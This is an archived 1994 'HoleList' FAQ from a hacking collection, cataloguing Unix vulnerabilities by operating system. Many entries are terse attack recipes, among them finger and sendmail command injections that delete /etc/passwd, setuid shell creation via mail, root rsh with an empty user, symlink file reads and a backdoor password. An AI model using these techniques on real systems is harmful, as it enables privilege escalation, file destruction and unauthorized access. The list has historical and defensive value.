home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / Hack Foo.sit / Hack Foo / holelist.txt < prev    next >
Internet Message Format  |  1996-11-29  |  22KB

  1. From HoleList F A Q
  2. Subject: HoleList    v7    12/13/94
  3.  
  4.     These bugs/holes are archived only as a record of security related
  5.     activity and are for educational purposes only.  This compilation
  6.     is not meant to encourage malicious activity and is not intended
  7.     to be a cookbook of cracking material.
  8.  
  9.     If you know of a hole or bug that is related to security and that is
  10.     not listed in the follow list, please contribute by sending E-Mail to
  11.     <scott@spy.org>.
  12.  
  13. BURST-    HOLELIST
  14.  
  15. ---
  16.  
  17. From: HoleList
  18. Subject: Holes'n'Bugs
  19. Date: 03/03/94
  20.  
  21.     These bugs/holes are archived only as a record of security related
  22.     activity and are for educational purposes only.  This compilation
  23.     is not meant to encourage malicious activity and is not intended
  24.     to be a cookbook of cracking material.
  25.  
  26.     If you know of a hole or bug that is related to security and that is
  27.     not listed in the follow list, please contribute by sending E-Mail to
  28.     <scott@spy.org>.
  29.  
  30. Operating System RVP   Date   Description (References)
  31. ================ === ======== ================================================
  32. /bin/sh         1-- 12/12/94 IFS hole, vi ()
  33. /bin/su         1--          overwrite stack somehow? ()
  34. /dev/fb         1--          frame buffer devices readable/writeable, ()
  35. /dev/kmem        1--          /dev/kmem shold not be o+w ()
  36. /dev/mem         1--          /dev/mem shold not be o+w ()
  37. /dev/*st*, *mt*     1--          generally world readable/writeable ()
  38. /etc         1--          rexd + MACH ? [NeXT] /etc/ g+w daemon ()
  39. 4.3 Tahoe        1--          chfn -- allows newlines/meta chars/bufsize ()
  40. 4.3 Tahoe        1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:got pw ()
  41. AIX ?         5++          setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()
  42. AIX 2.2.1     1--          shadow password file o+w ()
  43. AIX 3.1.5        5--          sendmail- mail to programs ()
  44. AIX 3.2          5--          sendmail- mail to programs ()
  45. AIX 3.2.4        5--          sendmail- mail to programs ()
  46. AIX 3.2.5        5--          sendmail- mail to programs ()
  47. AIX ?            1--          * password means use root's password? ()
  48. AIX ?            1--          rexd- any can get root access if enabled ()
  49. Amdahl UTS 2.0   1--          NFS mountd only uses hostname ()
  50. AT&T SVR3.2.0    1--          Bad protected mode allows root if have sh + cc ()
  51. A/UX 2.0.1       5--          lpr -s; 1000 calls lpr re-use fname ()
  52. A/UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof ()
  53. A/UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof ()
  54. BellTech SYSV386 1--          ulimit 0; passwd  ==> zero's out passwd file ()
  55. BSD 4.1          1--          Sendmail can mail directly to a file
  56. BSD 4.1          1--          can mail directly to a file
  57. BSD 4.1          1--          run set gid program, dump core, is set gid
  58. BSD 4.1          1--          lock- compiled password "hasta la vista", + ^Z ()
  59. BSD <4.2?        1--          IFS w. preserve bug in vi ()
  60. BSD 4.1          1--          mail directly to a file ()
  61. BSD 4.1          1--          exec sgid program, dump core, core is sgid ()
  62. BSD 4.1          1--          Sendmail: can mail directly to a file ()
  63. BSD 4.1         1--          lock password "hasta la vista" backdoor ()
  64. BSD <4.2         1--          IFS w/ preserve bug w/vi ()
  65. BSD <4.2         1--          suspend mkdir, ln file you want to dir ()
  66. BSD <4.2?        1--          suspend mkdir, ln file you want to dir ()
  67. BSD 4.2          1--          lock -- compiled in password "hasta la vista" ()
  68. BSD 4.2          1--          ln passwd file to mail spool, mail to file ()
  69. BSD 4.2          1--          can truncate read only files ()
  70. BSD 4.2          1--          finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
  71. BSD 4.2          1--          ln -s target ~/.plan; finger user to read file ()
  72. BSD 4.2          1--          lpr file; rm file; ln -s /any/filename file ()
  73. BSD 4.2          1--          adb su; change check in memory; shell out ()
  74. BSD 4.2          1--          race condition, can get root via "at" ()
  75. BSD 4.2          1--          lock -- compiled in password "hasta la vista"
  76. BSD 4.2          1--          ln passwd file to mail spool, mail user ()
  77. BSD 4.2          1--          can truncate read only files ()
  78. BSD 4.2          1--          finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
  79. BSD 4.2          1--          ln -s target ~/.plan; finger user. ()
  80. BSD 4.2          1--          lpr file; rm file; ln -s /any/filename file ()
  81. BSD 4.2          1--          adb su; change check in memory; shell out; su ()
  82. BSD 4.2          1--          race condition, can get root via "at" ()
  83. BSD 4.2          1--          /dev/kmem and /dev/mem  should not be o+w ()
  84. BSD 4.2          1--          signal any process by changing process group ()
  85. BSD 4.3          1--          ftp -n; quote user ftp; ect.  Gets root privs. ()
  86. BSD 4.3          1--          lpd can overwrite file ()
  87. BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell. ()
  88. BSD 4.3          1--          fchown (2) can chown _any_ file ()
  89. BSD 4.3          1--          race condition, get root via "at" ()
  90. BSD 4.3          1--          passwd chokes on long lines, splits pw file ()
  91. BSD 4.3          1--          ftp -n; quote user ftp; cd ~root, get root ()
  92. BSD 4.3          1--          lpd can overwrite file ()
  93. BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell ()
  94. BSD 4.3          1--          fchown (2) can chown _any_ file ()
  95. BSD 4.3          1--          race condition (expreserve?), root via "at" ()
  96. BSD 4.3          1--          passwd chokes on long lines, splits pw file ()
  97. BSD 4.3          5--          lpr -s; 1000 calls lpr re-use fname ()
  98. BSD NET/2        5--          rdist(1) uses popen(3), IFS spoof ()
  99. BSD NET/2        5--          lpr -s; 1000 calls lpr re-use fname ()
  100. BSD ?            1--          Overwrite gets buffer -- fingerd, etc
  101. BSD ?            1--          uudecode alias can overwrite root/daemon files ()
  102. BSD ?            1--          /bin/mail ; !/bin/sh    Get uid=bin shell ()
  103. BSD ?            1--          rwall bug ()
  104. BSD ?            1--          adb the running kernel, shell out and get root ()
  105. BSD ?            1--          sendmail can mail non-root file, try twice ()
  106. BSD ?            1--          rshd -- spoof via nameservice, rsh target -l uid
  107. BSD386         1--          mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
  108. buffer overrun      1--          chfn ()
  109. chfn, chsh     1--          used to create a root account ()
  110. chmod         1--          Incorrect file or directory permissions ()
  111. comsat         1--          running as root, utmp o+w, writes to files ()
  112. core         1--          will system dump a setgid core image? ()
  113. decode         1--          decode mail alias - write non-root user files ()
  114. DellSVR3.2/1.0.6 1--          Bad prot mode allows root if have sh + cc ()
  115. denial         1--          easy to hog processor, memory, disc, tty, etc ()
  116. DomainO/S <=10.3 1--          break root by using s/rbak; sgid/suid ()
  117. DomainO/S <=10.4 5--          sendmail mail to programs ()
  118. DNS         1--          SOA can control bogus reverse ip, rhosts ()
  119. Domain/OS <10.3  1--          break root by using s/rbak; setgid/uid ()
  120. DYNIX 3.0.14     1--          Sendmail -C file  ==> displays any file. ()
  121. DYNIX 3.?        1--          can get root on NFS host via root via mountd ()
  122. DYNIX 3.?        1--          on non-trusted host due to bug in mount daemon ()
  123. DYNIX ?          1--          rsh <host> -l "" <command>   runs as root ()
  124. DYNIX ?          1--          login: -r hostnameruser^@luser^@term^@ ()
  125. elm              5--          ELM's autoreply can be used to get root ()
  126. expreserve     1--          can be a huge hole  ()
  127. ESIX Rev. D      1--          Bad protected mode allows root if sh+cc ()
  128. file mod test     1--          test file doesnt lose the suid when modified ()
  129. fsck          1--          lost+found should be mode 700 ()
  130. ftpd         1--          static passwd struct overwrite, wuftp < x.xx ()
  131. ftpd 4.2     1--          userid not reset properly, "user root" ()
  132. ftpd ?         1--          core files may contain password info ()
  133. fchown         1--          test for bad group test ()
  134. ftruncate     1--          can be used to change major/minor on devices ()
  135. fingerd         1--          .plan hard-links - read files, fingerd ()
  136. gopher           6--          Type=8 Name=shell Host=;/bin/sh Port= Path= ()
  137. gnuemacs         1--          emacsclient/server allows access to files. ()
  138. GN <1.19         4+-          exec0::/path/prog?var=blah%0Ahack-coomands0%A ()
  139. HDB              1--          nostrangers shell escape ()
  140. HDB              1--          changing the owner of set uid/gid files ()
  141. HDB              1--          meta escapes on the X command line ()
  142. HDB              1--          ; breaks on the X line ()
  143. hosts.equiv      1--          default + entry ()
  144. hosts.equiv     1--          easy to spoof by bad SOA at remote site ()
  145. HPUX <7.0        1--          chfn -- allows newlines, etc ()
  146. HP-UX         1--          sendmail:  mail directly to programs ()
  147. HPUX A.09.01     1--          sendmail:  mail directly to programs ()
  148. HPUX ?           1--          Sendmail: versions 1.2&13.1 sm, -oQ > ()
  149. IDA 1.4.4.1     1--          :include:/some/unreadable/file in ~/.forward ()
  150. ICMP         4--          various icmp attacks possible ()
  151. ICMP         1--          ICMP redirect packets change non-static routes ()
  152. Interactive 2.x  1--          Bad protected mode allows root if sh+cc ()
  153. IRIX 3.3         1--          any user can read any other user's mail. ()
  154. IRIX 3.3.1       1--          any user can read any other user's mail. ()
  155. IRIX 3.3/3.31    1--          sendmail- any user can read other user's mail ()
  156. IRIX 4.0.X     1--          default suid scripts ()
  157. IRIX 4.0.X     1--          various $PATH problems ()
  158. IRIX 4.0.X     1--          sendmail race condition hole ()
  159. IRIX 4.0.X     1--          lpd are vulnerable too ()
  160. IRIX ?           1--          rsh <host> -l "" <command>   runs as root ()
  161. IRIX ?           1--          login: -r hostnameruser^@luser^@term^@ ()
  162. IRIX ?           1--          login: -r hostnameruser^@luser^@term^@ ()
  163. IRIX ?           1--          Overwrite gets buffer -- fingerd, etc ()
  164. IRIX ?           1--          uudecode alias can overwrite root/daemon files ()
  165. IRIX ?           1--          /bin/mail ; !/bin/sh    Get uid=bin shell ()
  166. IRIX ?           1--          rwall bug ()
  167. IRIX ?           1--          adb the running kernel, shell out and get root ()
  168. IRIX ?           1--          mail to any non-root owned file, try twice ()
  169. IRIX ?           1--          rshd- spoof via dns - rsh target -l uid ()
  170. IRIX ?           1--          xwsh log hole? (yo)
  171. kernel         1--          Race conditions coupled with suid programs ()
  172. lock         1--          4.1bsd version had password "hasta la vista" ()
  173. lost+found     1--          lost+found should be mode 700 ()
  174. lpd         1--          overwrite files with root authority ()
  175. lpr         1--          lpr -r access testing problem ()
  176. lpr              5--          lpr -s; 1000 calls lpr re-use fname ()
  177. lprm         1--          trusts utmp ()
  178. mount          1--          "mount" should not be +x for users. ()
  179. mqueue         1--          must not be mode 777! ()
  180. movemail         1--          worm? ()
  181. Microport 3.0    1--          ulimit 0; passwd  ==> zero's out passwd file ()
  182. network          1--          BSD network security based on "reserved ports" ()
  183. news             1--          news receivers may execute shell commands ()
  184. network         1--          kerberos ()
  185. network         1--          Networks are usually very insecure. ()
  186. NFS         1--          Many systems can be compromised with NFS/RPC. ()
  187. NFS              1--          proxy rpc can read remote nfs files ()
  188. NFS              1--          can generate NFS file handles ()
  189. OSF/1 1.2     1--          write allows shell outs to gain egid term ()
  190. OSF/1 1.3     1--          write allows shell outs to gain egid term ()
  191. OSF/1 1.2     1--          doesn't close the fd to the term writing to ()
  192. OSF/1 1.3     1--          doesn't close the fd to the term writing to ()
  193. passwd         1--          fgets allows entries mangled into ::0:0::: ()
  194. passwd         1--          fred:...:...:...:Fred ....Flintstone::/bin/sh ()
  195. passwd         1--          IDs shouldnt contain: ;~!` M- spoof popen ()
  196. portmap         1--          binding problems... ()
  197. root         1--          ? (fingerd_test.sh)
  198. rcp         1--          nobody problem ()
  199. rexd         1--          existence ()
  200. rexd         1--          MACH ? [NeXT] /etc/ g+w daemon ()
  201. rdist         1--          buffer overflow ()
  202. rdist            5--          rdist(1) uses popen(3), IFS spoof ()
  203. RISC/os 4.51?    1--          rsh <host> -l "" <command>   runs as root ()
  204. RPC         1--          Many systems can be compromised with NFS/RPC. ()
  205. rwall         1--          running as root, utmp o+w , writes to files ()
  206. SCO 3.2v4.2      5--          rdist(1) uses popen(3), IFS spoof ()
  207. SCO ?            1--          rlogin to any acct to trusted host w/o pwd ()
  208. SCO ?            1--          rlogin to any acct from trusted host w/o pwd ()
  209. selection_svc      1--          allowed remote access to files ()
  210. sendmail <x.x     1--          -bt -C/usr/spool/mail/user - reads file ()
  211. sendmail <5.57   1--          from:<"|/bin/rm /etc/passwd">  && bounce mail ()
  212. sendmail <=5.61  1--          can mail to any file not root owned, try twice ()
  213. sendmail <5.61   1--          sendmail- groups incorrectly, get group ()
  214. sendmail >5.65   1--          can get daemon privalages via .forward. ()
  215. sendmail ?       5++          can mail to programs (sendmal1, nmh, smail)
  216. sendmail ?       1--          debug option ()
  217. sendmail ?       1--          wizard mode ()
  218. sendmail ?       1--          TURN command allows mail to be stolen ()
  219. sendmail ?       1--          decode mail alias - write non-root user files ()
  220. sendmail ?       1--          buffer overflow cause sendmail deamon lock up ()
  221. sendmail ?       1--          what uid does |program run with? ()
  222. SIGNALS          1--          signal any process by changing process group ()
  223. Stellix 2.0?     1--          rsh <host> -l "" <command>   runs as root ()
  224. Stellix 2.0      1--          rsh <host> -l "" <command>   runs as root ()
  225. Stellix 2.1      1--          login: -r hostnameruser^@luser^@term^@ ()
  226. suid             1--          will run .profile if linked to - , IFS ()
  227. suid         1--          never call system(3) and popen(3) ()
  228. suid         1--          May not expect filesize signals, SIGALRMs ()
  229. suid         1--          no setuid program on a mountable disk ()
  230. suid         1--          ro mounting of foreign disk may allow suid. ()
  231. suid         1--          .plan links ()
  232. suid         1--          /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
  233. SunOS 3.3     1--          ftpd - userid not reset properly, "user root" ()
  234. SunOS 3.5        1--          connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
  235. SunOS <4.0       1--          any user can run yp server ()
  236. SunOS 4.0     1--          chsh -- similar to chfn ()
  237. SunOS 386i       1--          rm logintool, hack login with adb, chmod 2750 ()
  238. SunOS 386i/4.01? 1--          login -n root requires no password ()
  239. SunOS 386i/4.01? 1--          login -n root (no password) ()
  240. SunOS 4.0.1     1--          chfn buffer problems ()
  241. SunOS 4.0.1     1--          chsh buffer problems ()
  242. SunOS 4.0.1      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
  243. SunOS 4.0.3      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
  244. SunOS 4.0.3      1--          concurrent yppasswd sessions can trash yp map ()
  245. SunOS 4.0.3      1--          mail to any non-root owned file, try twice ()
  246. SunOS 4.0.3      1--          rcp buffer overflow ()
  247. SunOS 4.0.3     1--          sendmail- mail to non-root file, try twice ()
  248. SunOS 4.0.3      1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW ()
  249. SunOS 4.0.3      1--          uucico can show ph num, login, passwd, on remote machine ()
  250. SunOS 4.0.3      1--          ypserv sends maps to anyone w/ domain (ypsnarf)
  251. SunOS 4.0.?     1--          anyone can restore a file over any other file. ()
  252. SunOS 4.0.?     1--          chfn -- allows newlines, meta chars, bufsize problem. ()
  253. SunOS 4.0.?     1--          rcp with uid -2; only from PC/NFS. ()
  254. SunOS 4.0.?     1--          ln -s /any/suid/file -i ; -i ()
  255. SunOS 4.0.?     1--          selection_svc can remotely grab files. ()
  256. SunOS 4.1        1--          rshd: spoof via nameservice, rsh target -l uid ()
  257. SunOS 4.1        1--          shared libs accept relative paths w/ suid ()
  258. SunOS 4.1        1--          sendmail: groups incorrectly checked, can get any group ()
  259. SunOS 4.1     1--          comsat can overwrite any file ()
  260. SunOS 4.1.x      1--          comsat can overwrite any file ()
  261. SunOS 4.1.x      1--          ptrace allows to become root ()
  262. SunOS 4.1.x      1--          openlook: telnet 2000; executive,x3, run ps int ()
  263. SunOS <4.1.1     5--          lpr -s; 1000 calls lpr re-use fname ()
  264. SunOS 4.1.2      5--          rdist(1) uses popen(3), IFS spoof ()
  265. SunOS ?         1--          /usr/kvm/crash allows sh escapes group kmem ()
  266. SunOS ?         1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW()
  267. SunOS ?          1--          /dev/kmem and /dev/mem should not be o+w ()
  268. SunOS ?         1--          rshd -- spoof via nameservice, rsh target -l uid
  269. SunOS ?         1--          ftp -n; quote user ftp; ect.  Gets root privs. ()
  270. SunOS ?         1--          symlink .plan to target file, finger user to read. ()
  271. SunOS ?         1--          Overwrite gets buffer -- fingerd, etc.  (3.5)
  272. SunOS ?         1--          rwall bug (<= 4.01 yes). ()
  273. SunOS ?         1--          ptrace allows to become root ()
  274. SunOS ?      4--          icmp errors not handled correctly ()
  275. SunOS ?          1--          adb the running kernel, shell out and get root ()
  276. SunOS ?          1--          ftp -n; quote user ftp; ect Gets root privs ()
  277. SunOS ?          1--          lpd can overwrite file ()
  278. SunOS ?          1--          the window manager can be used to read any file ()
  279. SunOS ?          1--          rexd -- any can get root access if enabled ()
  280. SunOS ?         1--          emacsclient/server allows access to files ()
  281. SunOS ?          1--          openlook; telnet port 2000; executive,x3, runs PS interp
  282. SunUS ?         1--          devinfo can be used to get group kmem ()
  283. SunOS 5.1     1--          Symlinks are broken ()
  284. syslogd          6--          buffer overrun, allows remote access ()
  285. syslogd         1--          syslog messages used to overwrite any file ()
  286. system           1--          system(3) even w/ setuid(getuid()) = IFS ()
  287. SYSV <R4         1--          write to files; race condition w/ mkdir & ln ()
  288. SYSV <R4         1--          expreserve problem/race condition ()
  289. SYSV R?          1--          IFS, other environment at "login:" prompt ()
  290. tcp/ip           1--          sequence number prediction allows spoofing ()
  291. tcp/ip         1--          source routing make host spoofing easier ()
  292. tcp/ip         1--          rip allows one to capture traffic more easily ()
  293. tcp/ip         4--          various icmp attacks possible ()
  294. tftp         1--          puts/gets -- grab files, do chroot ()
  295. traceroute     1--          allow one to easily dump packets onto net ()
  296. ulimit         1--          passwd(1) leaves passwd locked if ulimit set ()
  297. Ultrix 2.0?      1--          sendmail- 1.2&13.1 sm, -oQ > can r/w any ()
  298. Ultrix 2.0?      1--          Sendmail -C file  ==> displays any file. ()
  299. Ultrix 2.2?      1--          Sendmail -C file  ==> displays any file. ()
  300. Ultrix 2.2       1--          ln passwd file to mail spool, mail to user ()
  301. Ultrix 2.2       1--          on a non-trusted host due to bug in mountd ()
  302. Ultrix 2.2       1--          Sendmail: -C file  ==> displays any file ()
  303. Ultrix 2.2       1--          can get root on NFS host via root via mountd ()
  304. Ultrix 2.2       1--          get root on host running NFS from other root ()
  305. Ultrix 3.0       1--          lock -- compiled in password "hasta la vista" ()
  306. Ultrix 3.0     1--          login -P progname allows run programs as root ()
  307. Ultrix 3.0       1--          login can run any program with root privs ()
  308. Ultrix 3.0       1--          ln -s target ~/.plan; finger user to access ()
  309. Ultrix 3.0       1--          any user can mount any filesystem ()
  310. Ultrix 3.0       1--          X11 doesn't clear pwds in mem; /dev/mem is o+w ()
  311. Ultrix <3.1      1--          limit file 0; passwd -->zero's out passwd file ()
  312. Ultrix <3.1      1--          lpd can overwrite any file (back to 2.0?) ()
  313. Ultrix 3.1?      1--          rshd: spoof via nameservice, rsh target -l uid ()
  314. Ultrix 3.1?      1--          allows newlines, meta chars, buffsize problem ()
  315. Ultrix <4.1      1--          overflow RISC reg buffer, get root w/ mail ()
  316. Ultrix ?         1--          rshd -- spoof via dns, rsh target -l uid ()
  317. Ultrix ?         1--          ypbind takes ypset from all; spoof yp DB ()
  318. Ultrix ?         1--          yppasswd leaves yp data files world writable ()
  319. Ultrix ?         1--          chfn -- allows newlines, meta chars, bufsize ()
  320. Ultrix ?         1--          ftp -n; quote user ftp; ect Gets root privs ()
  321. Ultrix ?         1--          can change host name, mount any filesystem ()
  322. Ultrix ?         1--          uudecode alias can overwrite root/daemon files ()
  323. Ultrix ?     4--          ICMP not handled correctly (nuke)
  324. Ultrix ?     1--          emacsclient/server allows access to files ()
  325. Ultrix ?         1--          lock: password "hasta la vista" backdoor ()
  326. Ultrix ?         1--          /dev/kmem and /dev/mem should not be o+w ()
  327. Ultrix ?         1--          can change physical ethernet address ()
  328. UNIX             1--          / must not be go+w ()
  329. utmp             1--          etc/utmp o+w ? ()
  330. utmp         1--          check to see if world writeable (rwall, comsat)
  331. utmp         1--          syslog messages can overwrite any file ()
  332. uucp         1--          check valid UUCP akts in the /etc/ftpusers ()
  333. uucp         1--          echo "myhost myname">x;uucp x ~uucp/.rhosts ()
  334. uucp             1--          uucico shows ph num, login, passwd, of remote ()
  335. uudecode     1--          if it is setuid, may create setuid files ()
  336. uusend           1--          uusend may call "uux" while suid to root ()
  337. uux              1--          uusend may call "uux" while suid to root ()
  338. X11R?            1--          snoop on keyboards and bitmaps ()
  339. X11R3            1--          can set log on and exec (fixed in "fix-6")
  340. X11R4            1--          can set log on and exec (fixed in "fix-6")
  341. X11R ?           1--          snoop on keyboards and bitmaps ()
  342. X11R5         5++          xterm can create files (xterm1__)
  343. xhost         1--          if + , anyone can connect to X server ()
  344. ypbind         1--          accepts ypset from anyone ()
  345.  
  346.  
  347.